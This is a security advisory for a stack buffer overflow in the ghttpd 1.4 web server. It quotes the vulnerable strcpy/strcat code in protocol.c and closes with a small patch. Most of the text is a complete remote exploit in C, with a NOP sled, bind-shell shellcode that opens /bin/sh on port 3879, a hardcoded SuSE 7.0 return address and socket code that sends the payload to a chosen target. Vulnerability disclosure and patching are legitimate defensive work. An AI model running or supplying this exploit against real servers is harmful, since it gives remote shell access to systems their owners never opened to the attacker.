COMMAND
ghttpd
SYSTEMS AFFECTED
ghttpd 1.4
PROBLEM
Lionel & Gangstuck found following. There is a buffer overflow
here:
-> GET /'Ax157'
-> GET /cgi-bin/'Ax149'(environ).
Code vulnerable:
/* protocol.c */
int serveconnection(int sockfd)
{
char filename[255];
...
Log("Connection from %s, request = \"GET %s\"",
inet_ntoa(sa.sin_addr), ptr);
if(!strncmp(ptr, thehost->CGIBINDIR, strlen(thehost->CGIBINDIR)))
{/* Trying to execute a cgi-bin file ? lets check */
ptr2 = strstr(ptr, "?");
if(ptr2!=NULL) { ptr2[0] = '\0'; flag = 1; }
strcpy(filename, thehost->CGIBINROOT);
ptr += strlen(thehost->CGIBINDIR);
strcat(filename, ptr);
// Filename = program to execute
// ptr = filename in cgi-bin dir
// ptr2+1 = parameters
...
strcpy(filename, thehost->DOCUMENTROOT);
strcat(filename, ptr);
...
/* ou */
PTR == Entrée socket
CGIBINROOT == /usr/local/ghttpd/cgi-bin
DOCUMENTROOT == /usr/local/ghttpd/htdocs
Code Exploit (proof of concept):
/*--------------------------------------------*/
/* Ghttpd 1.4 remote exploit */
/*--------------------------------------------*/
/* Auteurs : Lionel & Gangstuck */
/* Contact : cronos56@yahoo.com */
/* webmaster@clickmicro.com */
/* WEB : www.secu-fr.org */
/* www.clickmicro.com */
/* IRC : #:secu-fr #clickmicro */
/*--------------------------------------------*/
/* Party 2001 Lionel & Gangstuck - 30/06/2001 */
/*--------------------------------------------*/
/* GET /[NOPS] [shellcode] [ret] [ret] */
/* ret sur SuSe 7.0 : 0xbfffb504 == OK */
/* 0xbfffb515 == LTRACE */
/*--------------------------------------------*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define TAILLE 157 // taille du buffer à
overflowder
struct in_addr victim;
char overflow[4096];
char shellcode[] = // bind a shell to port 3879
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
/* mise en place de l'overflow */
int overflowed(char *ret){
int i;
memset(overflow, 0, sizeof(overflow));
strcpy(overflow,"GET /");
for(i=0;i<(TAILLE-(strlen(shellcode))); i++){
strcat(overflow,"\x90");
}
strcat(overflow, shellcode);
strcat(overflow, ret);
strcat(overflow, ret);
}
int envoie(struct in_addr addr,char *cport)
{
struct sockaddr_in serv;
int s;
int port=atoi(cport);
s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bzero(&serv,sizeof(serv));
memcpy(&serv.sin_addr,&addr,sizeof(struct
in_addr));
serv.sin_port=htons(port);
serv.sin_family=AF_INET;
if (connect(s,(struct sockaddr
*)&serv,sizeof(serv)) < 0){
perror("connect");
exit(0);
}
write(s,overflow,strlen(overflow));
write(s,"\n\n",2);
close(s);
}
int host_to_ip(char *hostname,struct in_addr
*addr)
{
struct hostent *res;
res=gethostbyname(hostname);
if (res==NULL)
return(0);
memcpy((char *)addr,res->h_addr,res->h_length);
return(1);
}
int main(int argc, char **argv){
char ret[8], serveur[256], port[8];
printf("Exploit ghttpd_1.4 by Lionel and GangstucK\n\n");
if(argc<2) {
printf("Usage : %s <serveur IP> [port]\n", argv[0]);
exit(0);
}
if(argc==3){
strncpy(port, argv[2], 7);
}
else{
strcpy(port, "80\0");
}
strcpy(ret, "\x04\xb5\xff\xbf"); // ret pour suse 7.0
strncpy(serveur, argv[1], sizeof(serveur)-1);
overflowed(ret);
if (!host_to_ip(serveur,&victim))
{
fprintf(stderr,"Hostname lookup failure\n");
exit(0);
}
envoie(victim,port);
printf("Remote shell listening to port 3879\n");
exit(0);
}
SOLUTION
Patch:
/* patch.diff */
44a45
> int tno;
106,107c107,108
< strcat(filename, ptr);
<
---
> tno = strlen(filename);
> strncat(filename, ptr,
sizeof(filename)-tno);
143,144c144,145
< strcat(filename, ptr);
<
---
> tno = strlen(filename);
> strncat(filename, ptr,
sizeof(filename)-tno);
You should run this patch against protocol.c.